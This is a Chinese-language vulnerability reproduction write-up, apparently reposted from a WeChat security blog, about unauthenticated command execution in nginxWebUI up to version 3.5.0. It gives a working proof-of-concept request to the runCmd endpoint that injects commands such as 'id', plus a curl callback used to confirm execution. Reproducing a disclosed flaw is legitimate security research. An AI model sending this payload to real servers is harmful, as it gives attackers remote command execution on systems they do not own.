nginxWebUI 命令执行漏洞

admin 2023年8月30日03:02:12评论7 views字数 1033阅读3分26秒阅读模式

声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。


0X01 简介

nginxWebUI是一款图形化管理nginx配置的工具, 可以使用网页来快速配置nginx的各项功能, 包括http协议转发, tcp协议转发, 反向代理, 负载均衡, 静态html服务器, ssl证书自动申请、续签、配置等, 配置好后可一键生成nginx.conf文件, 同时可控制nginx使用此文件进行启动与重载, 完成对nginx的图形化控制闭环。

 

官网地址:
https://www.nginxwebui.cn/
影响范围:

nginxWebUI <= 3.5.0

运行命令:

java -jar -Dfile.encoding=UTF-8 nginxWebUI-3.5.0.jar --server.port=8080(如果不设置编码网页容易出现乱码, 默认以8080端口启动)
nginxWebUI 命令执行漏洞
nginxWebUI 命令执行漏洞

0X02 复现环境

Windows:

                Windows 10

                192.168.245.134

                java 11.0.20

Linux:

                Ubuntu-22.04.1

                192.168.245.135

                openjdk 11.0.20

0X03 漏洞复现

POC:
http://IP地址/AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx

Linux服务器:

http://192.168.245.135:8080/AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx

nginxWebUI 命令执行漏洞

Windows服务器:

Windows环境搭建的应用执行POC没有回显,在服务器内查看是执行成功。

nginxWebUI 命令执行漏洞

验证可以通过dnslog等方式进行验证

http://127.0.0.1:8080/AdminPage/conf/runCmd?cmd=curl%20192.168.245.135:8080%26%26echo%20nginx

nginxWebUI 命令执行漏洞

nginxWebUI 命令执行漏洞
0X04 修复建议

更新至最新版。

0X05 写在最后

windows环境发现无法回显,不知道是不是我环境的问题,还是我的复现有问题,希望大佬指出。
想一起聊天可以加群:730057927
侵删!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】nginxWebUI 命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月30日03:02:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nginxWebUI 命令执行漏洞https://cn-sec.com/archives/1994186.html

发表评论

匿名网友 填写信息